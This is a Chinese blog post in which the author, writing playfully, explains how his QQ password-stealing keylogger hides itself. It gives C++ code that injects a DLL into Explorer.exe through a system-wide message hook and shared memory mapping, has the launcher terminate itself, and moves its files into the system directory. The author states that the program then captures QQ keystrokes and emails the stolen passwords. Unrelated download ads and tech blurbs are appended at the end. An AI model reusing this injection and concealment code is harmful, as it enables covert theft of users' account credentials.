戏说"QQ密码天使V1.1"进程的隐藏技术

本文介绍密码天使1.0程序,该程序原只能在wind9x下伪隐藏。作者采用系统级Hook和内存映射方法,通过WinExe.exe、Install.dll、GetKey.dll三个工程文件,将GetKey.dll注入到Explorer.exe进程中,实现隐藏,并让WinExe.exe和Install.dll在内存中消失,最后完成设置钩子、捕获按键等功能。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

如果你看了我的<密码天使1.0开发手记>,那么对我的开发思路应该有一个印象了~~但是这个程序有一个问题:它只能在wind9x下实现伪隐藏!何谓伪隐藏?嘻嘻~~就是伪装成服务进程,在进程列表中是看不到的!用RegisterSerivceProcess 函数将进程注册为服务模式就 OK了,不过,要是用进程查看工具,那可原形毕露呀!~~网上很多文章谈到远进程写入技术,这确实是一种高深度隐藏方法,不过,我的程序中没有用到,因为远进程技术在9x下无效,考虑到这个问题,我采用了另一种方法

在正式涉及到代码之前,我们先看看一些条件

首先我们要明白这样一个实事:如何进入一个进程内存空间也就是说怎么让具有执行任务的函数进入另一个程序呢?最规范的方法是系统级的Hook(钩子)功能!如果钩子存在动态库中,那威力就大增,可以干涉其它进程的正常工作

其次,内存映射通过映射的空间,我们可以在不同进程中共享空间中的数据,并当作自身进程空间的一部分。我没有用共享数据段,因为在多个DLLEXE中,数据要一致,我认为内存映射方便一些

现在我来说说程序的构成程序共有三个工程文件:WinExe.exeInstall.dllGetKey.dll。

         1. WinExe.exe运行后加载Install.dll。

      2. Install.dll中有一个辅助函数,实现将GetKey.dll注入到进它进程中去,本程序是注入到Explorer.exe中。此时的GetKey.dll就可在Explorer.exe的掩护下为所欲为了J!(设置钩子、捕获按键、发送邮件是不是有点象木马了?当然,程序还有一些小细节,能让WinExe.exeInstall.dll在内存中消失,而你同时按下[Ctrl+Alt+Delete]组合键是查不到的WinExe.exe这个进程的,如果你用进程查看器,倒是可以看到GetKey.dll已经成为Exeplorer.exe进程中的一部分了,合合~~!

也许,你会问:为什么不直接用WinExeGetKey注入到其它进程中呢??

这是行不通的,因为WinExeExepore.exe属于不同进程,它们在通常情况是不能相互访问的于是我用了一个中介工具(Install.dll)GetKey.dll注入到Exepore.exe中。是不是有点象火箭载飞船进入太空考查?哈哈,我瞎说罢! 
  我现在用插图来说明一下:
    

   
                      图 一

程序主体思想就是这样,现在我们按照图示进入代码!记住:我们的最终目标是进入Explorer中~~
   首先我们在要系统快照中找到我们要注入的进程(如果没有,注到哪里去呀,嘻嘻)下面的代码是通过快照找到Exeplorer.exe的进程ID(你可以选其它对象)

WindExe中我们主要是得到以下三个数据:一个是目标进程,一个是WinExe.exe的句柄,还有一个是当前的WinExe所处的路径。句柄有什么作用?嘻嘻~~~也许有人会说,WinExe的句柄到别的进程就无意义了,不过, 别忘记我介绍过的内存映射,它的出现,情况就不一样了至于得到一个路径有什么用呢?很简单,无论程序在什么地方运行,它的归宿只一个,那就是转移到系统目录下记住这个路径是为它自杀作准备的!啊!还有自杀呀!嘻嘻~~那确实~!

WORD CWinExeDlg::FindProcessId()

{

    DWORD  dwID;

    HANDLE m_handle = ::CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);

    PROCESSENTRY32* Info = new PROCESSENTRY32;

    Info->dwSize = sizeof(PROCESSENTRY32);

    BOOL bFind = Process32First(m_handle, Info);

    while (bFind)

    {

        CString strBigWrite;

        strBigWrite = Info->szExeFile;

        strBigWrite.MakeUpper();

        if (strBigWrite.Find("EXPLORER.EXE") != -1)

        {  

            dwID = Info->th32ProcessID;

            bFind = FALSE;

            break;

        }

        bFind = Process32Next(m_handle, Info);     

    }  

    delete Info;

    Info = NULL;

    CloseHandle(m_handle);

    return dwID;

}

    路径和句柄很容易得到,将这三个信息传入Install.dll Install.dll就是一个加工厂,将送来的原村料加工

在进入Install.dll之前,我们先看看工厂有些什么设备?!J

    以下这个结构和共享数据段是一回事!不过,我这个共享数据是一个结构体变量,准备让它记录共享的信息!

 

typedef struct _installinfo

{  

    char  m_cPath[256];// 路径

    DWORD m_dwExplorerId;//J还用说吗?

    DWORD m_dwGetKeyThreadId;// 看看CreateThread后一个参数  

HWND  m_hwnd;// 记录WinExe的句柄

 

}InstallShareData;

 

  看了设备后我们是不是要看看如何加工原料的吧?先将原材料放入到设备中与上面的结构一一对应)

void InstallInfo(char cPath[], HWND hWnd, DWORD dwPrId)

{

//  memset((InstallShareData*)lpInMem, 0, sizeof(InstallShareData));

    pInShare->m_dwExplorerId = dwPrId;

    pInShare->m_hwnd = hWnd;

    pInShare->m_dwGetKeyThreadId = 0;

    strcpy(pInShare->m_cPath, cPath);

    if (hInHookMsg == NULL)

        hInHookMsg = SetWindowsHookEx(WH_GETMESSAGE, GetMsgProc, g_hInstance, NULL);

}

    呵呵,看到了吗?我用了钩子这个钩子的作用是:当GetMessage在队列中找到消息后,它就开始处理消息了!我们看看这个钩子做了一些什么手脚,让GetKey是如何注Exeplore.exe的?

LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam)

{

    if (nCode >= 0  )

    {  

        if ( pInShare->m_dwExplorerId != 0 && 
             GetCurrentProcessId() == pInShare->m_dwExplorerId)

        {  

            pInShare->m_dwExplorerId = 0; // 不再需要监视explorer进程了

            CreateThread(NULL,0, (LPTHREAD_START_ROUTINE)OperateThreadpro,
                         NULL,0, &(pInShare->m_dwGetKeyThreadId));

        }

    }

    return CallNextHookEx(hInHookMsg , nCode, wParam, lParam);

}

 

有人说GetCurrentProcessId()打死都不等于pInShare->m_dwExploerId呵呵,还何况要pInShare->m_dwExploreId 不为零要是从常理上讲,确实如此因为你当前的GetCurrentProcessId()得到的WinExe的进程ID呀,怎么可能和ExPlorer的进程ID相等呢?在这里我曾用调试过,将比较结果输入到文件中,确实不相等!但是当你将内存映射的地址初化一下,也就是在DLL库的入口处(DllMain中)将映射空间的首地址赋予给结构体变量,sigh~~~~~~什么呀?说白了就是把内存映射的句柄强制转换成结构体变量!嘻嘻~~这样一来,它们就有相等的可能了!不过呢,此时GetCurretnProcessId()得到的不是WinExeID了,已进入到Explorer的地址空间了!

    看官注意:我们看看CreateThread函数,执行它的后果是什么呢?呵呵~~创建了一新的线程于Exeplorer中罢!那好,我们将目光锁定在OperateThreadpro这个全局线程函数中去!看看它又做了些什么手脚!!!!

void  OperateThreadpro(LPVOID pParam)

{

   typedef void (WINAPI * FUN)(void);

    HMODULE hmodule;

    FUN InstallGetKey;

    char cSysPath[256];

    ::GetSystemDirectory(cSysPath, 256);

    strcat(cSysPath, "//GetKey.dll");

    hmodule = LoadLibrary(cSysPath);// 系统目录

    InstallGetKey = (FUN)GetProcAddress(hmodule, "InstallGetKey");

    if (InstallGetKey != NULL)

    {   

       InstallGetKey(); // 当前线程是不是结束,请看它里面

    }

    else // 这种情况,很少发生!

      {

         FreeLibrary(hmodule);

         return ;

      }
}

   嘻嘻,怎么样,看到了吗?一个关键的地方是动态调用GetKey.dll,绝吧?!什么呀,你早就会呀,那你浪费时间呀?5555J动态加载dll后,自然就要执行它里面的关键函数:InstallGetKey(),现在我们只关心GetKey.dll,不是吗?原材料已加工成产品了,要买给客户呀!什么?你不卖?现在的社会象你这样的人太少了哟L(留下你的电话吧~~我要作专访~~

   看好,这个InstallGetKey()是一个导出函数,要不然在上面的线程中就有未定义的错误
  在GetKey.dll中也有一个结构如下:

typedef struct _installinfo

{   

     char  m_cPath[256];

     DWORD m_dwExplorerId;

     DWORD m_dwGetKeyThreadId;

     HWND  m_hwnd;

 

}INSTALLSHAREDATA;

 

    搞什么鬼呀?和前面的定义的结构是一样的呀?!要数据共享你就不要吝啬多写几下,给它赋一个初值吧?呵呵,是不是WinExe的句柄被映射到这里来了?!怎么一回事呀,你从EXE中取得路径呀什么的你不用呀?不急,不急,看后面撒!J

  我把这个函数帖出来!这么长,好烦燥的呢,呵呵!!

 

void InstallGetKey()

{

   HANDLE h = OpenFileMapping(FILE_MAP_WRITE | FILE_MAP_READ,
                             false, _T("MemNameInstall"));

  if (h != 0)

  {

    LPVOID p = MapViewOfFile(h, FILE_MAP_READ, 0, 0, 0);

    p_data = (INSTALLSHAREDATA*)p;     

    if ( p != NULL)

    {

        ::PostMessage(p_data->m_hwnd, WM_GOODLOOK, 1, 1);   // exe发送自杀命令

        Sleep(100);//等待100毫秒,这是好关键的!exe自杀也要一点时间嘛^_^
      UnmapViewOfFile(p);

        // exe进程结束后,将install.dllexe一并复制到系统目录下
       //然后将当前目录下的文件
Del掉!

        char cSExePath[256]; // exe路径

        char cSDllPath[256]; // install路径

        char cDExePath[256]; // 目的exe路径

        char cDDllPath[256]; // 目的dll路径

   

        strcpy(cSExePath, p_data->m_cPath);// 当前目录

        strcpy(cSDllPath, p_data->m_cPath);    

       

        strcat(cSExePath, "//WinExe.exe");// 带文件名           

        strcat(cSDllPath, "//Install.dll");

       

        ::GetSystemDirectory(cDExePath, 256);// 系统目录

        ::GetSystemDirectory(cDDllPath, 256);

       

        strcat(cDExePath, "//WinExe.exe");

        strcat(cDDllPath, "//Install.dll");

 

        if (strcmp(cDExePath, cSExePath) != 0)

        {  

            CopyFile(cSExePath, cDExePath, FALSE);

            if(!::DeleteFile(cSExePath))

            { 

                ofstream fs;

                fs.open("d://_ERROR_1.txt", ios::app);

                fs <<"出错码 = " << GetLastError() << endl;

                fs.close();

            }

        }

        if (strcmp(cDDllPath, cSDllPath) != 0)

        {

 

             CopyFile(cSDllPath, cDDllPath, FALSE);

             if(!::DeleteFile(cSDllPath))

             {

               ofstream fd;

               fd.open("d://_ERROR_2.txt", ios::app);

               fd << "出错码 = " << GetLastError() << endl;

               fd.close();

             }

        }

    }

    CloseHandle(h);

   }

   MSG msg;

   SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc);

   while (GetMessage(&msg, NULL, 0, 0))

   {

      TranslateMessage(&msg);

      DispatchMessage(&msg);

   } 

     // ExitThread(0);// 退出线程
//(要是真退出了,要记得关闭钩子)

}

  

   怎么样?这个函数功能还是不复杂吧!呵呵!我都做了详细的注释,相信你也看得懂!

我简单的说几点:
1.PostMessage(p_data->m_hwnd, WM_GOODLOOK, 1, 1)
这个就是发消息让WinExe自杀的!WinExe收到WM_GOOKLOOK后,证明注入已完成,WinExe留着没有作用了,没有作用就得死,好残酷哦

2. SetTimer(NULL, 1, 1000, (TIMERPROC)TimerProc),发出Timer事件,监视工作开始了,这个和1.0版本大同小异了!

3.不要忘记了,这个函数工作在一个辅助线程函数中,线程函数结束有二种情况:一种情况是自我结束,这种情属于安全结束;还有一种情况是进程结束,它必须无条件结束!在这里,我们不能让它结束我用了一消息循环,让循环持续它的生命当然如果要结束它,你可以定义一个全局变量,要定义在内存映射的结构中,在Install.dll中加载GetKey.dll时只要检查这个值通过这个值你就可以判断线程是不是还没有结束要是没有结束,你又想结束它,那就发一消息呀,不过,发这个消息要有点艺术,得用系统广播:

  SendMessage(HWND_BROADCAST, WM_YOURDEFINE,0,0)在上面的消息循环中加一判断就OK了!

      至此,程序已告已段落!剩下的部分和1.0版本中的处理一样:设置钩子->找QQ窗口->捕获铵键->记录密码->累计五个号码 发送一次

   要是看出什么破绽,请告诉我!^_^

 

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

源码直接下载地址: https://pan.quark.cn/s/a4b39357ea24 过采样与欠采样构成了数字信号处理领域中两种基础的采样策略,它们在工程实践应用时各自展现出独特的长处与短处及适用情境。以下将深入阐释这两种采样方法的运作机制,并对它们在实际操作中的区别进行细致对比。 我们首先阐释过采样的核心概念。过采样(Oversampling)一般是指运用高于必要标准频率对模拟信号实施采样。举例而言,当信号频率为70MHz且信号带宽为20MHz时,依据奈奎斯特采样准则,理论上采样频率只需略高于40MHz(即信号带宽频率的两倍)即可达成无失真采样。然而,在现实操作中,系统构造者常常会采用超过140MSPS(每秒百万次采样)的采样速率,这通常超出理论所需。过采样的主要不利之处涵盖:提升ADC输出数据速率,引发FPGA的时序挑战;增大功耗、ADC及FPGA的制造成本。尽管存在这些不足,过采样依然具备其有利之处,例如可提供处理增益、频率规划的伸缩性以及能够处理更宽的信号带宽。 接下来,我们探讨欠采样的基本原理。欠采样(Undersampling)是指以低于理论标准频率对信号进行采样,这在处理高输入信号频率时尤为有效。例如,针对70MHz的中频(IF)信号,通过欠采样能够采用低于40MHz的采样频率进行采样,从而将数据速率降至FPGA,减少时序挑战,节省能量消耗和成本。实现欠采样的关键设计考量在于它能够在系统设计中达成所需的ADC动态性能。 欠采样的优势体现为能够简化硬件构造,比如降低对高速数据捕获的需求,并且在设计条件允许时,可选用较慢的ADC来削减成本。然而,欠采样技术也存在其局限性,例如在ADC的非理想表现可能导致非线性失真,诸如二阶(HD2)和三阶(HD3)谐...
源码链接: https://pan.quark.cn/s/3523d8c4b5d2 ### Qt5.9.1开发的应用程序转换为可安装`.exe`文件的详细流程 #### 一、概述 本资料将系统性地阐述如何将基于Qt5.9.1版本或其他Qt框架版本开发的应用程序转化为可直接安装的`.exe`安装文件。这一过程不仅适用于Qt5.9.1版本,对其他版本的Qt框架开发的应用同样适用。 #### 二、前期准备 在开展相关操作前,需确保已达成以下准备要求: 1. **开发环境配置**: 利用Qt5.9.1或其他版本完成应用程序的开发工作,并保证能够顺利编译出可执行程序。 2. **NSIS安装**: NSIS(Nullsoft Scriptable Install System)作为一个开源的Windows安装系统,能够支持创建专业的安装程序。用户可从官方渠道或可靠来源获取最新版的NSIS并进行安装。 #### 三、制作可执行程序的流程 ##### 3.1 打包应用程序文件 需要将已开发好的Qt应用程序的所有组件和资源整合到一个文件夹中,例如命名为`Qt_Video`。确保该文件夹内包含所有必要的库文件和资源文件,以便应用程序能够独立运行。 ##### 3.2 压缩文件随后,将整个`Qt_Video`文件夹压缩成`.zip`格式的文件。这一步骤可通过Windows内置的压缩工具或第三方软件完成。 ##### 3.3 创建安装文件接下来,借助NSIS将压缩文件转化为安装文件。具体操作如下: 1. **启动NSIS**: 运行NSIS软件并进入其主界面。 2. **选择基于ZIP的安装模式**: 在主界面中选取“**Installer based on ZIP file**...
内容概要:本文介绍了一种结合单像素检测与数据融合技术的千亿体素级多维荧光成像方法,并提供了完整的Matlab代码实现。该方法融合压缩感知理论与单像素成像原理,通过优化测量矩阵设计、重构算法及多维度数据融合策略,实现了在大幅降低数据采集量的前提下,完成高分辨率、高通量的三维荧光成像,特别适用于大规模生物样本的快速、高效成像需求。文中系统阐述了成像系统的建模过程、关键算法的设计思路以及重建性能的优化路径,充分展现了其在超高体素规模下的成像能力与精确重构优势。; 适合人群:面向具备信号处理、光学成像或生物医学工程等相关专业背景的研究生、科研人员及工程技术开发者,尤其适合熟悉Matlab编程并致力于先进成像技术研究与算法复现的专业人士。; 使用场景及目标:①应用于大规模生物组织的三维荧光成像,显著提升成像效率与图像质量;②为单像素成像、压缩感知与多源数据融合等前沿技术提供可复现、可扩展的算法框架;③支撑高维医学影像重建、新型显微成像系统开发及相关科研与工程实践。; 阅读建议:建议结合所提供的Matlab代码进行模块化分析,重点理解测量过程的数学建模与图像重构算法的实现细节,宜在掌握基本理论的基础上开展仿真实验与参数调优,以深入把握核心技术原理与工程实现要点。
下载代码方式:https://pan.quark.cn/s/a4b39357ea24 Node.js 是一种开放源代码且能够在多种操作系统上运行的 JavaScript 执行环境,它使得开发人员能够在服务器端执行 JavaScript 代码。Node.js 采用了 V8 引擎,该引擎是由 Google 为 Chrome 浏览器开发的一个高性能的 JavaScript 解释器。Node.js 的 16.x 版本在其发展历程中占据着重要位置,其中包含了众多新功能以及性能上的改进。标题 "Nodejs16-x64 windows安装包" 指向的是专为 Windows 操作系统设计的 64 位版本的 Node.js 16 安装程序。在 Windows 平台上安装 Node.js 的 64 位版本对于处理大量数据或运行需要高性能的应用程序来说尤为关键,因为 64 位系统能够更有效地利用硬件资源。描述 "Nodejs-16 x64位windows 安装包" 明确了该安装程序是为 Windows 用户准备的,特别是对于那些需要运行 64 位应用程序的用户。x64 表明该版本兼容 64 位架构,意味着它能够充分利用 64 位计算机的内存和处理能力。标签 "Node Nodejs nodejs16" 提供了关于此安装包的核心信息,表明它与 Node.js 相关,并且具体指的是 v16 版本。这些标签有助于进行搜索和分类,从而方便用户找到他们所需要的特定版本。压缩包文件 "node-v16.18.0-x64.msi" 代表实际的安装文件,其中 "v16.18.0" 指示了 Node.js 的具体版本号,"x64" 再次强调了其适用于 64 位系统,而 ".msi" 后缀表明这是一...
源码链接: https://pan.quark.cn/s/3af847fbbec7 在计算机科学与编程领域中,十六进制(Hexadecimal)以及二进制(Binary)是两种关键性的数值表示方法。十六进制属于一种基于16的计数系统,它运用0至9的数字以及字母A至F(分别象征10至15的数值)来呈现数值,与此同时,二进制则是一种基于2的计数系统,仅采用0和1两个符号。掌握这两种进制之间的相互转换对于深入理解计算机内部运作机制具有决定性意义,因为计算机在底层数据的存储与处理环节通常都是以二进制的形式来进行的。将十六进制转换成二进制的过程可以通过以下几个环节得以完成: 1. **单个十六进制符号的转换**:每一个十六进制符号对应着4位二进制序列。具体而言: - 十六进制中的`0`在二进制表达为`0000` - 十六进制中的`1`在二进制表达为`0001` - 十六进制中的`2`在二进制表达为`0010` - 依此类推 - 十六进制中的`9`在二进制表达为`1001` - 十六进制中的`A`或`a`在二进制表达为`1010` - 十六进制中的`B`或`b`在二进制表达为`1011` - 十六进制中的`C`或`c`在二进制表达为`1100` - 十六进制中的`D`或`d`在二进制表达为`1101` - 十六进制中的`E`或`e`在二进制表达为`1110` - 十六进制中的`F`或`f`在二进制表达为`1111` 2. **多位十六进制符号的转换**:针对一个由多个十六进制符号组成的数值,我们可以逐个符号进行转换,并将得到的二进制序列依次拼接。例如,十六进制数`3F`转换成二进制形式为`00111111`。 3. **编程实现方法**:在编程实践过程中,众多编程语言提...
下载代码方式:https://pan.quark.cn/s/a4b39357ea24 **Vue.js 框架全面解析** Vue.js 是一种轻量级且高性能的前端JavaScript框架,因其便捷性、适应性和可扩展性而备受开发者青睐。在“nodejs+vue”的在线购物平台中,Vue.js 主要承担构建用户界面的任务,并提供数据绑定、组件化、路由管理等关键功能。 1. **数据绑定**:Vue.js 的核心优势之一是双向数据绑定,它借助 `v-model` 指令将视图与数据模型建立联系,确保视图层的变动能即时同步到数据模型,同时数据模型的变化也能实时反映在视图上。在在线购物平台中,这一特性可用于商品列表的动态展示和购物车状态的即时调整。 2. **组件化**:Vue.js 提供了功能强大的组件体系,允许开发者将用户界面拆分为独立且可复用的模块。例如,在在线购物平台中,商品展示模块、购物车功能、支付流程等均可封装为组件,从而提升代码的复用性和可维护性。 3. **指令与过滤器**:Vue.js 中的指令如 `v-if`、`v-for` 和 `v-bind` 用于控制元素的渲染方式及行为,过滤器则能对数据进行格式化处理,例如货币显示、时间格式转换等。在在线购物平台中,这些功能有助于更有效地展示商品信息并优化用户交互体验。 4. **计算属性与侦听器**:计算属性能够监测多个数据源并输出计算结果,而侦听器则能在数据变动时执行指定操作。在在线购物平台中,计算属性可用于自动计算购物车总金额,侦听器则可响应库存变动并实时更新商品状态。 5. **Vue Router 路由管理**:在单页应用(SPA)环境中,Vue Router 是不可或缺的组件,它负责管理页面间的导航和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值